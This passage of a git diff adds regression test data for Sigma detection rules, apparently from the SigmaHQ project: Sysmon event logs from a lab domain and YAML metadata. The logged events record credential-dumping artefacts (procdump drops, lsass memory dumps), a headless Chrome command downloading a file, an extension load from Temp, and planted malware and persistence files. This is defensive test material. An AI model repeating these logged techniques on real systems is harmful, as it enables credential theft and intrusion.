"Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.154339Z" + } + }, + "EventRecordID": 26362, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.160852Z" + } + }, + "EventRecordID": 26366, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe", + "CreationUtcTime": "2025-10-24 23:43:34.145", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.177439Z" + } + }, + "EventRecordID": 26369, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.177", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.183790Z" + } + }, + "EventRecordID": 26373, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.178", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe", + "CreationUtcTime": "2025-10-24 23:43:34.178", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.211790Z" + } + }, + "EventRecordID": 26376, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.209", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml new file mode 100644 index 000000000..a5cb1267d --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml @@ -0,0 +1,13 @@ +id: ef67d58b-a7c2-434f-af87-34ae280a2968 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 + title: Cred Dump Tools Dropped Files +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx new file mode 100644 index 000000000..b03d00a13 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json new file mode 100644 index 000000000..9a8ee4004 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:45:24.807660Z" + } + }, + "EventRecordID": 28881, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:45:24.804", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\lsass.dmp", + "CreationUtcTime": "2025-10-24 23:45:24.804", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml new file mode 100644 index 000000000..0850ca601 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml @@ -0,0 +1,13 @@ +id: 5640730a-30d1-4aca-9ad3-dbb9000bb091 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c + title: Potentially Suspicious DMP/HDMP File Creation +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx new file mode 100644 index 000000000..55bd83fe1 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json new file mode 100644 index 000000000..615f60c7b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:54:01.546728Z" + } + }, + "EventRecordID": 86290, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:54:01.546", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\evil.doc.lnk", + "CreationUtcTime": "2025-10-24 23:54:01.546", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml new file mode 100644 index 000000000..e82d1a336 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml @@ -0,0 +1,13 @@ +id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3215aa19-f060-4332-86d5-5602511f3ca8 + title: Suspicious LNK Double Extension File Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx new file mode 100644 index 000000000..5c79f4658 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json new file mode 100644 index 000000000..1895a93a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:52:38.278829Z" + } + }, + "EventRecordID": 74174, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:52:38.276", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Users\\Public\\persistence.bat", + "CreationUtcTime": "2025-10-24 23:52:38.276", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml new file mode 100644 index 000000000..4886f7841 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml @@ -0,0 +1,13 @@ +id: 9556b96b-462a-4238-a0bf-5e11ff0408fe +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e + title: Suspicious Binaries and Scripts in Public Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx new file mode 100644 index 000000000..17b2b288b Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json new file mode 100644 index 000000000..6852f7618 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:51:54.709878Z" + } + }, + "EventRecordID": 67705, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:51:54.705", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\RECYCLERS.BIN\\malware.exe", + "CreationUtcTime": "2025-10-24 23:51:54.705", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml new file mode 100644 index 000000000..92e45724e --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml @@ -0,0 +1,13 @@ +id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + title: Suspicious File Creation Activity From Fake Recycle.Bin Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx new file mode 100644 index 000000000..b74cf1217 Binary files /dev/null and b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx differ diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json new file mode 100644 index 000000000..811d5f7a9 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:50:20.590884Z" + } + }, + "EventRecordID": 53968, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:50:20.576", + "ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002", + "ProcessId": 2956, + "Image": "C:\\Windows\\system32\\taskmgr.exe", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP", + "CreationUtcTime": "2025-10-24 23:50:20.576", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml new file mode 100644 index 000000000..13c91674b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml @@ -0,0 +1,13 @@ +id: 55db307d-4a36-4594-bea8-7d114714d3b4 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 69ca12af-119d-44ed-b50f-a47af0ebc364 + title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx new file mode 100644 index 000000000..56a66952d Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json new file mode 100644 index 000000000..796430f09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:20:06.319147Z" + } + }, + "EventRecordID": 32822341, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:20:06.307", + "ProcessGuid": "5AA13A44-ACA6-68FE-DE5D-000000004002", + "ProcessId": 9184, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --headless --enable-logging --disable-gpu --dump-dom \"http://10.0.1.14/nas.txt\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml new file mode 100644 index 000000000..3b5f80023 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml @@ -0,0 +1,12 @@ +id: 941b970d-535f-4543-8985-768e589fa8ff +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e + title: File Download with Headless Browser +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx new file mode 100644 index 000000000..8c5b800c8 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json new file mode 100644 index 000000000..aea7029d1 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:25:03.181097Z" + } + }, + "EventRecordID": 32923086, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:25:03.169", + "ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002", + "ProcessId": 4788, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml new file mode 100644 index 000000000..48a2dca40 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml @@ -0,0 +1,12 @@ +id: e159e6ce-c717-4a38-af44-ff8c4f011c37 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + title: Chromium Browser Instance Executed With Custom Extension +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx new file mode 100644 index 000000000..b078b6611 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx differ diff --git 